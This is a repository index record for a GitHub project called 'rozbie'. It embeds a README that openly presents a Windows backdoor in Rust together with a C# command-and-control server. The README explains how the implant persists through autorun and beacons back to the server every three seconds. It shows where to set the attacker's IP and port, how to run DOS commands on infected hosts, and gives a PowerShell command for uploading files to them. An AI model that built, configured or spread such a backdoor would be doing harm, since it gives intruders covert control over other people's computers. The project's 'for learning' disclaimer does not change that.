{"id":20041611,"url":"https://github.com/rozensoftware/rozbie","last_synced_at":"2025-09-20T09:31:15.736Z","repository":{"id":155472102,"uuid":"616152164","full_name":"rozensoftware/rozbie","owner":"rozensoftware","description":"A simple malware written in Rust. It opens a backdoor on the infected host.","archived":false,"fork":false,"pushed_at":"2023-03-25T22:16:33.000Z","size":90,"stargazers_count":5,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2024-11-13T10:49:14.305Z","etag":null,"topics":["backdoor","command-line","csharp","hacking","malware","rust","spying"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rozensoftware.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-03-19T18:55:37.000Z","updated_at":"2024-09-27T13:20:34.000Z","dependencies_parsed_at":null,"dependency_job_id":"426a3f8e-4368-422a-800f-6531cb72ec86","html_url":"https://github.com/rozensoftware/rozbie","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Frozbie","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Frozbie/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Frozbie/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Frozbie/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rozensoftware","download_url":"https://codeload.github.com/rozensoftware/rozbie/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":233649800,"owners_count":18708444,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","command-line","csharp","hacking","malware","rust","spying"],"created_at":"2024-11-13T10:47:17.646Z","updated_at":"2025-09-20T09:31:10.427Z","avatar_url":"https://github.com/rozensoftware.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Rozbie\n\nVersion: 0.1.0\n\nThis is a simple and very standard malware code that provide an access to the infected host.\nThe Rozbie works only on Windows OS.\n\n## Project\n\nThe presented solution consists of two project:\n\n1. Rozbie malware written in Rust. It is a program that must be run in the target system to give an intruder an access to the system's command line console.\n2. Rozbie Farm is a server in which you can execute commands to run on infected with Rozbie computers. It can handle multiple instances of Rozbie.\n\n![Rozbie Farm](https://github.com/rozensoftware/rozbie/blob/master/RozbieFarm.jpg)\n\n## Installation\n\nIt is up to you how you install Rozbie on the target computer.\nOn successful run the Rozbie will add itself to the Windows current user autorun. It should run after the user logged into system.\nWhen it is there it will try to connect to The Rozbie Farm application once per 3 seconds.\nYou should be able to type DOS commands in the Rozbie Farm application to be executed on the infected computer.\n\nYou must change the *IP* address and eventually the port to yours in the main.rs:\n\n```rust\nconst SERVER_IP: \u0026'static str = \"192.168.0.22\";\nconst SERVER_PORT: \u0026'static str = \"1973\";\n```\n\nThe same must be changed on the C# side in the Server.cs file:\n\n```csharp\nprivate static readonly int SERVER_PORT = 1973;\nprivate static readonly string SERVER_IP = \"192.168.0.22\";\n```\n\n## Special commands\n\nThe Rozbie should execute almost every DOS command on the infected host.\nThere is a special command that can be executed only by the Rozbie:\n\n1. 'q' - Shutdowns Rozbie.\n\n**Note:** After user logged into the system current directory of the Rozbie should be Windows\\System32 which can include thousands of files.\nIt's better to type first: 'cd ..' to change directory to one level up instead of 'dir'. There is a static buffer which can hold up to 1MB of data only.\nYou can change it to a bigger value of course. It is something to address in future commits but as long as it is just a small vicious program, some optimizations are missing now.\n\n## FAQ\n\n- How can I upload something to the infected host?\n\nYou can do it by executing PowerShell command, e.g.:\n\n```powershell\npowershell -c \"Invoke-WebRequest -Uri 'https://www.website.com/file.zip' -OutFile 'c:\\temp\\file.zip'\"\n```\n\n## Note\n\nFor a more sophisticated solution try [Flea](https://github.com/rozensoftware/flea)\n\n## Disclaimer\n\nThe author of this code is not responsible for the incorrect operation of the presented code and/or for its incorrect use. The code presented in this project is intended to serve only to learn programming.\n\n## License\n\nThis project is licensed under MIT\n\nMIT license (LICENSE-MIT or \u003chttp://opensource.org/licenses/MIT\u003e)\n\n## Contributing / Feedback\n\nI am always glad to learn from anyone.\nIf you want to contribute, you are more than welcome to be a part of the project! Try to share you thoughts first! Feel free to open a new issue if you want to discuss new ideas.\n\nAny kind of feedback is welcome!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frozensoftware%2Frozbie","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frozensoftware%2Frozbie","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frozensoftware%2Frozbie/lists"}